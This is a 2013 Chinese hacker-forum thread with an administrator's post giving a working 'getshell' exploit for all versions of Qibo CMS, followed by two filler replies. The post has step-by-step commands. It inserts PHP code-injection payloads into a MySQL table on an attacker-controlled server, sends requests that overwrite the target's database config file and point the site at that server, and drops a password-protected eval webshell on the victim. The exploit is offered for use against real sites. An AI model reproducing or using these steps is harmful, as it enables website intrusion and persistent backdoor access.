搜索
查看: 796|回复: 2

齐博cms 全版本getshell

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-10-8 07:42:05 来自手机 | 显示全部楼层 |阅读模式
本地架设qibocms 安装好,然后 进入mysql 开启外链,路由开启3306端口映射 ,然后mysql执行 insert into qb_jfabout(fid,title,content) values(1,'${@phpinfo()}','${@phpinfo()}');
这个只是测试phpinfo的 我给出gestshell的exp
mysql执行  insert into qb_jfabout(fid,title,content) values(1,'${@$sl = @fopen("slhack.php", \'a\')}','${@@fwrite
($sl, \'<?php eval($_POST[slhack]) ?>\')}');
这样准备工作就OK了 找到目标站点
http://xxx.com/do/fujsarticle.php?type=like&FileName=../data/mysql_config.php&submit=fuck ;覆盖mysql配置文件
http://xxx.com/do/jf.php?dbuser=数据库账号&dbhost=数据库ip&dbpw=数据库密码&dbname=数据库名&pre=数据库前缀默认是qb_&dbCHARSET=utf8&submit=getshell
这个数据库账号那些 是自己本地的 远程执行哦~
成功后会在do目录创建slhack.php密码为slhack的一句话
放出视频一枚
http://url.cn/Mz9S3Y
专业回帖 该用户已被删除
发表于 2013-10-8 07:46:26 | 显示全部楼层
俺是专业顶贴滴~~~
854955425 该用户已被删除
发表于 2013-10-8 08:48:14 | 显示全部楼层
路过,学习下
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表